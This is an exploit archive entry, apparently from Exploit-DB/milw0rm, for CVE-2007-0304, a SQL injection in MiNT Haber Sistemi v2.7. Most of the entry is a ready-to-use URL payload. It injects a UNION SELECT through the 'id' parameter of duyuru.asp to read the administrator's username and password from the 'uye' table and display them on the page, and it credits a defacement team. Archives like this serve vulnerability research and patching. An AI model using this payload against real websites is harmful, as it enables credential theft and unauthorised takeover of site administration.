Mint Haber Sistemi 2.7 - 'duyuru.asp?id' SQL Injection

Author: chernobiLe
type: webapps
platform: php
port: 
date_added: 2007-01-11 
date_updated: 2016-09-21 
verified: 1 
codes: OSVDB-32820;CVE-2007-0304 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.commint_haber_sistemiv2.7.zip

###############################################################
#MiNT Haber Sistemi v2.7 (tr) == SQL Injection Vulnerability
#Author : chernobiLe
#Site : www.cyber-sabotage.org , www.chernobiLe.com
#Contact: info@cyber-sabotage.org
###############################################################
#Risk : High
#Download Link Of MiNT Haber Sistemi v2.7 : http://www.aspindir.com/Goster/4539


#Exploit;
#Admin Nick, Passport, Mail;
http://[SITE]/duyuru.asp?id=6+union+select+0,kul_adi,sifre+from+uye+where+id=1


#Union data Text;
#Duyuru Basligi :  USERNAME
#Duyuru Metni  :    PASSWORD

#Greetz: All CSDT ( Cyber Sabotage and Defacer ) TEAM

# milw0rm.com [2007-01-12]